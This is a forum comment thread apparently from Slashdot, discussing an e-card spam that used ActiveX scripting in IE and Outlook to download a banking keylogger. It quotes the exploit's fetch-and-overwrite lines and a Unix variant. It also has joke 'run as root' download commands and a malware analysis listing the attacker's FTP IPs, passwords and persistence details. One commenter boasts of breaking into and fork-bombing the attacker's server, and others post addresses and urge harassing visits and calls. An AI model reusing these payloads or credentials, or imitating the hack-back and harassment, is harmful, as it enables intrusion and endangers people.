Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

Re:Yes , indeed!

[Spoing]

1. First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

While that is true of the person you have responded to, the number of steps required (not optional) in a *nix environment to do the wrong thing is quite long. It requires experience to do the wrong thing. An average user would not be able to do these things, so they are safe where using Windows and a bad mail client like Outlook exposes them to danger easily and in some cases unavoidably.

Re:Yes , indeed!

> Please tell me how a mail program that only deals with plain text can be compromised

Google for "Pine Exploit", and you find numerous ways this can happen.

Re:Yes , indeed!

you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard

Exactly- the problem's not the program9s) or the OS(s), it's the fucking STUPID ASS users!!!

Re:Yes , indeed!

[skyhawker]

He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible.

At the time, their analysis was probably valid, because email clients could not run executable code. Being able to do so is a relatively recent invention. Furthermore, Microsoft has exacerbated the problem with their ActiveX technology -- something that is not found in any other browser on any other operating system. And the example exploit shows some sort of script that writes to the filesystem, something that most, if not all, other browsers don't allow. So yes, Microsoft is a major part of the problem, and most users of alternative operating systems don't really have to worry about this kind of problem.

Re:Yes , indeed!

[Viol8]

Fair enough , a buffer overflow bug can occur in any program. But thats a bug , its not exploiting a *designed in feature* of the client.

Re:Yes , indeed!

[Reziac]

Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

More to the point, do you know enough about programming to *identify* any malicious or vulnerable routines in that source code? And even if you're that good, are you sure you didn't miss one??

Re:Yes , indeed!

So you review the source from start to finish before you complile and only run binaries from a trusted source...which of course could never be compromised. Great.

I write all of my software myself, you insensitive clod!

Re:Yes , indeed!

[ONOIML8]

It wasn't long after the "experts" said not to worry that the first major Outlook exploit happened. Maybe a month.

You're right about ActiveX, I don't argue that. And yes, Microsoft and their close source with slow repairs is a big part of the problem. A bigger part of the problem is the dominance of Windows, it's easy to write one little thing that will screw a vast majority of users.

But to say that most users of other OS don't have to worry about that kind of problem, well I still think that's a pretty sheltered view. Maybe it would be better put to say they don't have to worry about it as much....for now.

Anyone in West London?

[cobyrne]

According to the UK NIC, adversting.co.uk (the people who host a.exe) are at 13 The Glen, Southall, UB2 5RS.

If you are in the area, and have sufficient curiosity, you can use this map to guide you to the location mentioned above.

DISCLAIMER: it is possible that the UK NIC has the wrong information. It is possible that adversting.co.uk have nothing to do with a.exe (their web server may have been compromised).

Re:Anyone in West London?

[first.last]

DISCLAIMER: it is possible that the UK NIC has the wrong information. It is possible that adversting.co.uk have nothing to do with a.exe (their web server may have been compromised).

Fuck it, just tell GW they have WMD

Hey, it had a EULA...

[MadAnthony02]

the buddylinks spyware that the OP refers to actually pops up a box, complete with a link to a EULA, to accept or stop the install.

The text of the EULA lists all the stuff that it does - send ads out to other people on your buddy list with no action on your part. And yet people agreed to it. And in general, shrink wrap/click wrap licenses have been held as legal.

The problem is once again human nature - people are used to clicking yes on those boxes because they were originally for stuff you actually needed to view a webpage (Windows Update, shockwave and flash plugins, ect). People don't bother reading them, just click yes, and wind up installing toolbars, gator, weatherbug, bonzibuddy, and the rest of that crap.

Only in the last 5 years???

[Viol8]

I'm sorry , what planet are you on? Security has been a major issue to some of us for over a decade AT LEAST! Just because MS suddenly pricked
up its cloth ears only 5 years ago didn't mean other companies or instutions didn't give a damn. You think DEC was extolling the virtues of security in VMS back
in the 80s just for a laugh?? God I wish some of the people on here would realise that every issue in the computing industry didn't arrive when they
personally became aware of it.

Re:Only in the last 5 years???

[jfengel]

I should clarify: I was referring to personal computers, which weren't commonly networked at all until 10 years ago. People just wanted software that worked, for the most part, and it was rarely brought to their attention that networking made them extremely vulnerable.

I personally am well aware of security; I wrote my thesis on multilevel compartmentalization back in the 80s. VMS was often applied to systems that did have to worry about security: banks, online transaction processing, etc.

Personal computers, for home and office, rarely received that kind of attention. Even today, most software is rarely written with security in mind. Deliberately networked programs, like operating systems, mailers, and browsers receive the most attention.

But you hear about exploits in music players every so often. I'm sure that with enough effort one could create, say, a Photoshop file that hijacked it. Non-networked applications still don't receive the attention they deserve, from MS or any other vendor, except under those circumstances that absolutely require it.

So no, this didn't appear mysteriously five years ago, but Microsoft wasn't the only one to "prick up its ears" around then. The Macintosh didn't even have memory isolation until three years ago. and today the majority of programmers still code less defensively than they should, because real security takes a hell of a lot of effort.

More exactly...

[abb3w]

The "Administrators". "Users", and "Power Users" groups all exist on WinXP home&pro. Of course, you need to know to go into the MMC computer management snap in and change the users' groups manually.

Yes

[bagofbeans]

Ecards, party organise sites also.

I also nicely ask people who send me 'interesting' stuff (jokes/politics/whatever) and cc people I don't know not to do it again. The second offense, I am ruder. I have had no spam ever on my 3 yr old yahoo address...

Re:It'd be scary if I ran my PC as Administrator..

[cyt0plas]

You have received an E-Card. If you're using Outlook[express], you are already infected.

For unix/linux users, run "exec -o lynx --dump http://oursite.com/evil.sh". This command should be ran as root. You may need to compile lynx from source.

I'm quite sure...

[Kjella]

I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.

Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.

It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.

They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.

But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.

So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.

Kjella

Re:I'm quite sure...

[misleb]

It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI.

It is as if computer users are Girlfriends From Hell(tm). If I was a computer, I would have broken up with users a long time ago... particularly if I had mind-bogglingly good AI.

-matthew

Re:I'm quite sure...

[The+Bullroarer]

What would be really interesting is an aptitude test built in to the software. If users want to enable "power user" features, they would first have to pass the computerized aptitude test. Users who fail would have to wait a set period (like a month, a year, a century :-> ) before trying again.

Hey, how about this? The "enable advanced features" button pretends to enable power user features, but only fabricates different scenarios to test the user's response to them? For example, for a month after clicking this button, a luser would see e-mails in his inbox which are manufactured by the software to see whether he's dumb^H^H^H^Htrusting enough to click on an e-mail like "I need you help to access my money" or "Incease your {p*n*s|br**st|p*cs} size now!!!" Satisfactory performance over a sufficient period of time would enable actual use of advanced features.

If that idea is too impractical, what about just linking advanced features to the presence of quality AntiVirus software? Whenever I'm called in to work on a clien't computer, I check their antivirus protection and strongly recommend Norton if it isn't already installed. (I am multiOStral, consulting for Macs and PCs, and learning Linux.) You could have the button saying "Enable Power Features" check for the presence of updated AV software. If same is not present, the box would say:

You have requested a feature which requires the presence of anti-virus software. Please install such software before attempting to use this feature. Consult your local X vendor for appropriate titles.

Does anyone know how much damage a naive luser could actually do with AV software installed?

Re:e-cards

[LighthouseJ]

I was going to moderate this message, but I wanted to respond.

At greeting card stores, they have blank greeting cards. For instance, if it's a happy birthday card, on the front might be an 8 year old girl blowing out birthday candles and nothing else is on the front or inside of the card. Just get that and copy the greeting from the e-card site, it shows the receiver that you're giving personal attention to them with an "original" greeting, as opposed to a pre-printed greeting.

Email invitations, greeting cards and such are so tactless anyway. You and your wife can expel the $.99, if that, to get a nice card, or like I said above, make your own. Trust me, your friends you send cards to will appreciate the effort.

Obvious, but too good to miss...

"To view this e-card, please move the attachment to your home directory, then open a konsole window and enter these commands:

cd ~
tar xzf evil_virus.tar.gz
cd evil_virus
./configure
make
su root (enter your root password when prompted)
make install
/usr/local/bin/evil_virus

Congratulations! Your greetings card will now be displayed!"

Re:Obvious, but too good to miss...

[eugene+ts+wong]

That looks too hard. Do you have a way to do it without typing?

ways to fool even skilled computer users?

[Jay9333]

The author said as his conclusion, "Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users."

I'm not so sure this hijacker found a way to fool "even experienced and skilled computer users". Anybody with even a very basic know-how of how to safely use a web browser knows that you shouldn't even go to websites if you don't know and trust the person or organization directing you to that website (especially if you're running IE!).

Someone get this on dslreports.com please

The author fingers the hosting company for the spammer located in the US.

Can someone with a dslreports.com account get this listed as a news item?

Thanks.

Userland Trojans

[nurb432]

They can still have a huge effect on things, remember your address book is available as a 'user'.

So is the ablity to spam out via smtp.... Or turned into DDOS node...

True, its harder to trash the system, but as far as causing issues for all your friends, you dont need much in the way of rights....

This applies to whatever OS you use really....

I'll bet...

[first.last]

this guy would go to the PIs and contract clap, just to see what its like...

MacOSX Mail

[Espectr0]

Anyone knows how to disable html completely in Mail?

Going to preferences, viewing, and unchecking the "display images and embedded objects" doesn't work properly.

I find Mail very incomplete, but it has a plugin for easy viewing hotmail mail. Anyone know something similar for thunderbird?

Re:e-cards

[gnu-generation-one]

"What really annoys me about e-cards is that even the legitimate ones look like spam"

Send people a tutorial on how to _attach_ the cute picture to the email, and write the text themselves?

Saves us all time...

Re:Frightening - "Not just your PC"

[NotQuiteReal]

I would never even entertain the idea of putting some dubious product, purchased via SPAM advertising on my delicate dangly parts!

If you did get some growth, you'd be lucky if it were benign. One-eyed trouser trout - ha! Think three-eyed fish from the Simpons!

Keep HTML ditch activex

[gad_zuki!]

The only real "exploit" here is the activeX installer. Most email clients render plain-text URLs clickable anyway.

There's a reason why this stuff is written with activex controls - they look official like they're from the operating system. Disable activex and watch the spyware go away. It seems most people know not to download an .exe but think activeX, expecially when its "signed," means that its safe.

Icon + Pilgrimage == TOURISM

[rdmiller3]

Anyone else catch the phrases, "historic icon" and "scientific pilgrimage" in one quote from the leading 'discoverer'?

I wonder how many ships of the same class as the HMS Beagle were made, and how much it'll cost the locals to get it endorsed as 'authentic'?

And isn't it amazing how these fans of evolutionary theory are almost religious about it all?

Evolutionism is a religion when they say that they know how something evolved. Creationism is a science when they find a fossilized hat and disprove the accuracy of commonly accepted dating methods.

Re:Icon + Pilgrimage == TOURISM

[not-my-real-name]

Well it's obvious to me that spam has evolved from its early days of usenet green cards. Methods of fighting spam have also evolved.

Re:Icon + Pilgrimage == TOURISM

[rdmiller3]

I'm pretty sure I replied to the Beagle Found article... I don't know how this got stuck under the adjacent one.

Re:I am a windows user

[gwayne]

I don't know much about windows except the fact that...everything is already done by someone else.

Therein lies the problem. One can relatively secure a Linux box in half an hour:

1. Disable unnecessary services.
2. Configure iptables.
3. Update to latest versions.
4. Run through CERT security checklist

Try disabling IIS on Windows Server and see what else breaks.

Re:It'd be scary if I ran my PC as Administrator..

[ONOIML8]

You think you have to do all that to compromise your system?

Better think again.

Nice Spin, MS

This article describes a new feature that is added to Outlook 2002 in Microsoft Office XP Service Pack 1 (SP-1)... Click Start, and then click Run. In the Open box, type regedit...

Was the (Cough) "new feature" originally only intended for internal use (where they know how really risky using their own products can be), or is Regedit going to replace menus in future versions of Windows?

Doesn't work here...

Out of curiosity, I tried to make my own version of the exploit. I didn't overwrite WMP, but I had it write a file to disk.

On Win2k/IE6, I get two warning dialogs.

On my coworker's XP machine, it just plain doesn't work.

Maybe if we had done stuff with HTML mail instead of inside IE it would have worked...

Are Unix systems secure?

[cpghost]

As Unix(*) users, we feel pretty confident when confronted with this kind of a.exe crap. But seriously, what would have happened, if the file was a Linux executable? A shell or perl script? Are we still secure? Maybe, maybe not:

• It depends what browser we're using. Browsers on Unix normally don't execute remote code, but the more browsers we use, the less we can be sure.
• Are our rendering engines (Gecko and Konqueror) really immune to buffer overruns of malicious web sites? We don't know for sure. Most of us are aware of Konqueror dumping core, but no harm is done, because a Windows virus couldn't start. What if the remote site contained valid Linux instructions instead?
• A whole class of vulnerabilities consists of so called cross site scripting vulns (see bugtraq).
• Even if an executable runs with the permissions of a regular, non-root user, are we still secure? I've seen setups where the user was member of group 0 (wheel), which opened up a whole lot of potential vulnerabilities.

The biggest asset of the Unix community is still the high level computer literacy amongst its users. We're smarter than regular Windows users on the average, and we know better than to blindly click on links when we're being told to. But with growing Linux popularity, we're bound to "inherit" more unsavvy and clueless computer users, which would be just as malleable as Windows users.

The last line of defense(tm) consists of just two principles:

• We don't run our browsers in kernel mode.
• We don't use the root account for regular activites (right?).

Will that be enough, once spammers start targetting Linux? Let's hope for the best.

(*) Unix in the generic sense, not Darl's.

Re:Are Unix systems secure?

[cavac]

There's another line of defence, at least for Unix-Geeks (but not your "My browser is a Compaq"-User): Unix-Geeks tend to use non-Intel Hardware more frequently, so just inserting Assembler-Code into a running program will not work for at least one of two reasons:

1) The stack is not compatible
2) The CPU just shrugs at the code and kills your program

Shell-Scripts would be not that easy, because they would be quite complicated to run on enough shells with a huge mess of incompatible commands and command-line tools.

As for Perl: You can either include all needed modules into your script (which is quite hard because some of them need compiling to your EXACT target configuration) or your script might use your victims CPAN-module (which might not even be configured correctly) and tie up the users computer for hours while the virus/worm is *trying* to install required modules.

In my opinion, the main reason that there are very few Unix and Linux virii and worms is that binary programs most likely would have to use the autoconf/automake framework (or something similar) and the targets package managment tools to sort out the target's mess before beeing able to do some nasty stuff. Same problem with scripts.

For example: On a barebone NetBSD fileserver, a script worm might have to install pkgsrc (the package managment), perl and Mail::SMTP or alternivitely configure sendmail, allow it in rc.conf and start it before beeing able to act as a mail-relay. A BINARY worm with its own SMTP-engine would be quite useless, because it would not only have to match the target platform, but the System version as well, because network libraries AND threading change constantly these days...

Writing a worm/virus for Unix/Linux might be most promising when you got a very specific target host. But to say writing a general one for a variety of platforms and distributions would be a nightmare is a very optimistic view at best.

LLAP & LG
Rene

Re:Are Unix systems secure?

[cpghost]

A perl script doesn't really need any CPAN modules at all to be effective. Just take SMTP as an example: this is an extremely simple protocol that you can simulate in a few lines of perl (at least enough of it to send gazillions of spams!). You don't really need Net::SMTP or some such.

An executable ELF binary doesn't need autoconf, automake etc. to run. That already happened at compile time. Again, a carefully written C program could use only glibc, and nothing more. No need to use external (networking? protocol?...) libs or other dependencies, which may not be present on the target machine.

Of course, if you don't use x86, you'd be pretty secure.

Keep M$ Apologists Employed! Write more viruses!

[gfecyk]

> If you've going to have to replace most of
> your application software and half your
> peripherals to run as a regular user,
> wouldn't it be easier to just replace your
> operating system?

People won't switch from what they've grown accustomed to. It's actually easier to replace hardware once, and certain applications once, than to replace an OS, notably across a whole enterprise. And it's actually easier to replace Win95/Win98 with Win2K than is it to replace it with XP, never mind any Linux distro or BSD.

> Because then you'd keep Microsoft apologists
> like him out of work.

He hit the nail on the head there. :-) Only instead of patching Microsoft OSes I'd be patching Linux OSes and closing different IP ports. Same garbage, different OS.

Sure, this keeps me in contracts. If people were really scared of Windows they'd all switch to OpenBSD. But they won't. They'll just secure their Windows desktops like the pros do.

And I don't need M$ bugs to keep me employed - there are plenty of idiots out there writing viruses to keep me in work for years to come.

Sigh scare mongerer.

[SmallFurryCreature]

Repeat after me. HTML RENDERING IS NOT HARMFULL. We are here on slashdot not the bloody bbc. All that rendering html in an email could do is send info that you read the email by opening a link to a server under a spammers. Yes this is undesirable since it allows them to verify a spammed address is alive.

Nothing else. All the other troubles are due to the execution of scripts. If the various graphical email programs would just stick to rendering html and leave javascript and others untouched then there would be no email-virusses. (well except for the ones launched through buffer overflows)

So it would only require a little bit of thought to give people the "nice" look off html email without the security problems. Prohibit external links and only allow links to attached files (wich since they are links without script can't be executed until the viewer clicks them) and you will even remove the privacy invasion. All the attractiveness of the web without the insecurity.

Given all that why exactly was the execution of code added to email? There must have been a decission made at MS at sometime but anyone ever see the reasons for it?

Oh and don't get me wrong. I hate html formatted emails since they are pain to read on remote shell. Sadly I am a linux geek and everyone else seems to disagree. No other slashdotters do not matter, you are geeks too.

Re:Sigh scare mongerer.

[turnstyle]

"Repeat after me. HTML RENDERING IS NOT HARMFULL."

No, you are wrong.

A very simple example is an HREF that seems to be pointing to a trustworthy site, but really points elsewhere.

In fact, Slashdot specifically includes defenses against such simple tricks.

For example, http://www.TrustworthySite.com.

In a plain text reader, it would be obvious that really links to http://www.NastyEvilDoer.com

Apache hacked...

[Ayanami+Rei]

And when it gets hacked, it's usually because someone is using an extension that tries to do a lot, or isn't as popular as the default ones, or is non-standard.
Go figure.

Re:I am a windows user

I also use Linux, and I know Unix inside out.

There's your problem. If you knew Unix inside and out, or even non-inverted (right side out), you'd have no problems.

HTML email

[phorm]

A lot of people are blaming this on allowing HTML in email, but the fact is that HTML is a *STATIC* language... it can't - or at least shouldn't be able to - hurt your PC.

Now, by either having a parse exploit with the HTML (bad client coding), or allowing scripts (really poor security) then problems arise...

Personally, I dumped Outlook a loooong time ago. Thunderbird is nice and not hard for most users to switch to, my primary beef is that it doesn't seem to have an option to block images but allow by sender/site - or to allow a particular message to be clicked to show images (some catalogues I get via subscription in my email have images I want to see)

Re:Keep M$ Apologists Employed! Write more viruses

Yeah, because I spend hours a week re-patching the continual stream of security updates that come out of kernel.org and apache.org. Most people aren't "scared" of windows because most people can't get past basic concepts like "double-clicking" and dragging things on the desktop, much less know how to "secure their Windows desktops". I've even met some of you "certified" windows types. Can't say I'd want to work with someone who can merely complete a memorizable test for a cash-in-exchange-for-a-certification. Oh well, you get paid by lemmings to do MS's dirty work. Hope you're happy. Meanwhile, some of us have things to actually "do" instead of wasting our time mucking around with today's security patch.

Internal Layout of the Pentagon

http://www.dtic.mil/jcs/j6/sponsor/pentroom.htm

Re:Internal Layout of the Pentagon

you serious? that's a .mil site - trust it?

Tell me Mozilla doesn't do that. Or won't later.

[gfecyk]

> x.Open("GET", "http://adversting.co.uk/a.exe",0);
> s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

Go ahead and tell me Mozilla doesn't do this:

> x.Open("GET", "http://adversting.co.uk/a.sh",0);
> s.SaveToFile( "/usr/bin/su",2);

or some variant of that. If it blocks that, then it's probably breaking some functionality that other users want.

Speaking of breaking functionality in the name of security, here's a question: Why did Sun DOWNGRADE the Java 1.1 security standards from Java 1.0? Could it be because too many coders asked for it? If you can't do that code snip in Mozilla now, how long before some one else demands it?

From another Vmyths rant:

Guess what? Java or Linux or whatever comes next will create even more homogeneity at the session, presentation, and application layers. "Sure, Rob, but we'll sacrifice flexibility & functionality for safety when VaporOS v1.0 debuts." Ah, of course. Will VaporOS v1.1 downgrade its security specs like Java v1.1 did?

So why not visit the perpetrator?

[BobzNKazoo]

This seems like a pretty vicious email, so why haven't the cops visited the guy yet?
Better yet, why not visit the perpetrator in person and educate him as to how some folks feel about this? According to the Peoplepages Phone Directory at http://directory.superpages.com he lives just east of Nashville, TN and mapquest will give you a map to his front door. Any slashdot folks in Nashville want to pay him a visit?
The rest of us could just phone him at 3:00 in the morning.

Re:So why not visit the perpetrator?

Apparently class of '2000!

http://www.apsu.edu/matthewsf/expolympics/expoev en twinners.htm

http://www.geocities.com/CollegePark/Quad/4551/m jl ocal.html

the correct plural of virus is "viruses"

Not "viri" and not "virii". Stop pretending like you know latin when you obviously don't. It makes you look stupid.

Re:Redundant, I know. Don't run as Administrator.

[beer_maker]

Why are you trusting the users to run their own anti-virus updates? If you support an organization, why aren't you running your own anti-virus server?!

Re:e-cards

So you're saying its not "the thought" but "the money they spent," that counts?

I love that joke!

[filmsmith]

It's even funnier when the one posting it has a number HIGHER than that of the person he's replying to.

fs

Re:record reboot....

A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

Yeah, it's really amazing how much MSBlaster is still going around, I recently got a copy of XP (Yes, I have a linux box also, but I heard on /. that BSD is dead, so I don't have a box with that on it.), and I'm on a 26,400 dialup connection (no alt., sad, but true), and when I went on line to "activate" my copy of XP, the box was infected within the first minute!

There wasn't even enough time to "activate" XP, I was blown away at how fast it got me!

Fortunately, I have already scrubbed blaster from several of my less computer saavy friends boxen, so it was a cinch to make mine "well" again.

But under a minute on a slooow dialup connection, really gets me...

Use Mozilla.

[Futurepower(R)]

Obviously, Mozilla. Don't turn off HTML, because there are no known exploits for Mozilla.

Re:Use Mozilla.

[jez9999]

Unfortunately, Mozilla's e-mail client does not allow for use of one Local Mail tree for all POP3 accounts.

( http://bugzilla.mozilla.org/show_bug.cgi?id=30057 )

Re:Use Mozilla.

[FluffyOne]

It does. See here:

http://bugzilla.mozilla.org/show_bug.cgi?id=44863# c66

Unfortunately, there's no UI for this functionality yet.

Ronny

Analysis of the malicious a.exe

I downloaded a.exe out of curiousity, and have been analysing it. The file contains a number of very interesting strings, which make it quite obvious that this program attempts to hijack the user's personal login information as they log in to various popular Internet banking services.

The strings are (trivially) encrypted, by XOR'ing each character with 255. They make frightening reading. I have listed some of them below.

Of particular interest are the five at the top. Seems as if the details are uploaded to one of two FTP sites, and the exploit may affect people using Opera as well as IE. Don't know how though - Opera has never seemed anywhere near as buggy.

64.191.23.212 21 ircd thepassw0rd https
http
Internet Explorer
Opera
69.93.102.218 21 logi bbzaza123 hangseng
HSBC
bank
ufjbank ... continues for 152 more of these.

I tried to log in to those FTP sites, but no luck :(. I would have taken great delight in deleting the lists of account numbers that had undoubtedly accumulated.

Re:Analysis of the malicious a.exe

You forgot to mention some stuff:

It installs a keylogger somewhere (windows\system, or application data\) and starts it as "ra32.exe" .
It logs stuff to C:\WINDOWS\SYSTEM\~key.log and C:\WINDOWS\SYSTEM\~post.log

Nice you name the site though, hope the hoster has deactivated it already, because you don't want anyone to have that info...
There are some other strings in it that display info on the build-process:
"g:\!Work\__Current\$0000_FHooker_Chazer\Release\T rojWithHooker.pdb
g:\!Work\__Current\$0000_FHooker_Chazer\Dll\Releas e\DLL.pdb"

Concluding: this is no simple spammer, it's a criminal that has his eyes on money.

Re:Analysis of the malicious a.exe

> this is no simple spammer, it's a criminal that has his eyes on money.

Too right. I did manage to log in to that site, and it was full of spamming software, email lists, and what I can only assume were lists of account numbers.

However, I have done a nasty little number on it, deleting as many of the criminal's logs as I could and disrupting the operations of the things they had installed, which included a webserver and an ftp server. The machine has now been knocked off line by a fork bomb. Better to do that than let it carry on harvesting email addresses and account numbers.

I just hope that the real sysadmin will notice the breakin now. He clearly hasn't been very good at keeping the machine up to date!

Re:I hate ecards (Java/Javascript)

[gruntled]

Java uses a sandbox. But Javascript does not. Many gurus, like Ed Felten of Princeton, keep Javascript (which incidentally is not really related to Java; Javascript was named as a marketing ploy) turned off. I've tried that, but too many sites use JS.

Outlook is the problem.

[techno-vampire]

Outlook has always been a mass of bugs held together by security holes. This isn't going to change because NanoLimp is more interested in giving lusers the point'n drool UI they want, rather than good programs. Not only that, there are more people looking for more security holes and more people exploiting them because most PC lusers use it. Why? Not because it's good; it isn't. They use it because it's there, and they have no idea that there are other email clients out there. As long as this continues, the easiest way to be safe is not to use Outlook; whatever other program you use will have holes -- no program is completely safe -- but nobody will be looking for them. Running with the herd is easy, and seems safe. In this case, it's the most dangerous thing you can do but most people will because it's easier than thinking for themselves.

Re:I am a windows user

[Tarwn]

OK, I run both, but lets do to one of my Windows Boxes what you do to your Linux box:
1. Disable unnecessary services - darnit, I already did this and check only after major installs, but consider it ten minutes if you have to google any of them
2. Configure iptables - Ok, not quite the same, but I installed norton and configured it to ask first on just about everything
3. Updates - ok, this one took a while, luckily I had latest service packs handy already, which meant only 3 reboots for norton (argh)
4. Hrm, didn't do this. But my firewall is blocking all traffic that is externally initiated, and only allowing certain trusted applications out. Outlook doesn't render HTML (this was by default in my 2003 install), IE is patched all the way up...etc etc

As far as disabling IIS...no problem. Well, now I don't have ftp or www servers running, but my mail is still going out if thats what you were implying would break...? You realize that IIS is not required during installation, right?

I agree that Outlook (and in fact IE) should not have access to WScript and CScript anymore than any browser should have access to it's OS's scripting engine (running shell scripts for instance) BUT I also have to say that I have only ever had 2 viruses infect my machines, and one of those was from an Apache server for another popular tech website that had been cracked.

But perhaps I should check CERT again, make sure SSH doesn't have a buffer overrun (dude, is it me or does every verion start out with one of these? :P), etc.

you bounce apps that don't work?

Go ahead, get the current version of AutoCad working, and post it here. I've got three or four mailing list managers that run only in admin mode, probably could use the same massaging.

My current burr is QuickBooks Pro 2003. It's a Java app, nothing else. Portable across the OSes? No way, it runs in IE6 and nothing else and it has to be continuosly connected to the internet. Now what fuckwit thought it a good idea to put financials on an exposed computer? Good thing no virus writer ever used or heard of Intuit.

ASCII just as good!

[letdownjournals]

I don't see why people use html e-cards, when ASCII pictures of kitties, butterflies and tweety birds are JUST as cute.

Payload

[Bob+Ince]

I'm amazed that no-one has yet posted an analysis of the final payload 'a.exe'.

This decompresses and drops 'ra32.exe', 'lanext.dll' and 'lanman.dll' into the Application Data\Microsoft folder, and sets ra32.exe to run on startup through a HKCU\Software\MS\Win\CV\Run registry entry.

These files act as a keylogger. When they sees one of a built-in list of online bank sites being used, it logs keypresses for a bit and uploads the result via FTP to a server controlled by the attacker.

Bizarrely, for me in Windows 2000, it also opens an alert box with the message 'timediff' every 60 seconds. Bug?

Cut them off at the source!!!

[filekutter]

I decided the info you posted was enough to warrant a bit of decisive action, so i sent a letter to WilTel with a link to the examination of the spam.. This was the reply... WOW, thanks for the expert analysis...I'll forward on to our Abuse Team and the sales VP who manages this account. Might at least hamper the Tennessee spammer a few minutes... :)))))

Mozilla's Stupid Dinosaur Splash Screen

[BigBlockMopar]

Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!

I loved the dinosaur splash screen, too. But I couldn't show those releases of Mozilla to my boss (a government manager type - think of Lumbergh in Office Space) - because it made Mozilla look like it was designed and built by 16-year-old virgins with anime posters on their walls.

Now, with that dinosaur splash screen, can I honestly deploy Mozilla onto the desktops of dozens of judges, business CEOs, and lawyers who make >$5,000,000 a year? They won't take it seriously and will therefore resist it. At least the drab orange box looks like some sort of corporate logo that they'd see if they went for a drive around the suburbs of Palo Alto - it lends credibility.

Think of people like Frasier Crane - he's a caricature of the middle-aged successful man, the sort of person who makes big purchasing decisions based on tastefulness rather than functionality. "I don't care if you say that I'll get e-mail viruses! I'm *not* going to stare at KMail all day! They don't even have a real spellchecker!"

(NB. The lack of a real spellchecker was fixed in KDE 3.2.)

This is the same sort of problem we have *everywhere* with open source, shareware and free software from Linux to Mozilla, and including things like AVI Preview (comes with Kazaa Lite) - tacky and stupid user interfaces lacking the same features as the Microsoft equivalent we're trying to replace.

I've ranted about this a lot over the years.

Windows 98 still supported

[jwd630]

Windows 98 support was extended through 2006 "Windows 98 and Windows 98 Second Edition support was scheduled to end on January 16, 2004. However, continual evaluation of the Support Lifecycle policy revealed that customers in the smaller and the emerging markets needed additional time to upgrade their product. "

In other words, customers who we were going to abandon looked like they might jump to Linux rather than buy XP; so we decided we would string them along for another couple of years until we can convince them that Longhorn "is the most secure version of Windows ever" TM

There Goes The Neighbourhood

[rixstep]

Everyone's got good advice. Here organised crime makes an inroad into flaky MS technologies and to avoid a panic, people here and elsewhere advise turning off HTML, turning off JavaScript, turning off VBScript, abandoning LookOut, abandoning Internet Exploder...

It's all good advice, but it's pretty damned late. The writing was on the wall way back in May 2000, when ILOVEYOU hit. It was obvious even then that the entire world was sleeping. And although suspicions are still high that ILOVEYOU was actually an accident, the damage was real.

Half a year after ILOVEYOU, a concerned programmer decided to release a similar program into the wild, just to shake people up, and remind them that they hadn't learned a thing from the trauma half a year earlier.

And it didn't help a bit.

Today, with more holes in MS technology than openings in a fish net, the advice is still to turn off HTML, turn off JavaScript, turn off VBScript, abandon LookOut, abandon Internet Exploder...

Will no one realise that something is very very wrong when a technology such as MS's can allow arbitrary execution of code through a layer that by definition is supposed to not be able to do this? Will no one realise that the error is not in activating bells and whistles, but in the design itself?

MS is not going to survive. Only the criminals want this. Without millions of unprotected PCs out there, run by people who have no clue and can't be expected to, they're out of money.

This Internet used to be a cool thing. When was the last time any of you could concentrate on that, and not on all these MS-inflicted woes?

It's true, more than anyone can fully appreciate: the mongrels Bill Gates and Steve Ballmer ruined the neighbourhood.

Re: This whole article is FUD.

[davegust]

The default security settings would have to be significantly loosened for any aspect of this exploit to work.

None of the ActiveX controls used by this exploit (XMLHTTP, ADODB.Stream, Scripting.FileSystemObject, WScript.Shell) are marked "safe for scripting". This means the default security settings would not allow these controls to run from any web server -- even 127.0.0.1. You would have to significantly tweak your IE security settings for this weak excuse for an exploit to work.

If an IE user is really paranoid of ActiveX, it's very easy to completely disable it. Unfortunately your browsing experience will look like Mosaic circa 1995.

No to all Tip

[JurgenThor]

Well, I just went a googling to find a link to prove my claim (above), but a quick review found nothing. I'm sure I've seen those dialogs though!! I DID find stories lamenting the lack of a button, but give the tip of holding down 'shift' while clicking No. Apparently this means 'No to All', but only works in XP (sorry 98 users).

Only load images you trust

[chlorophyl]

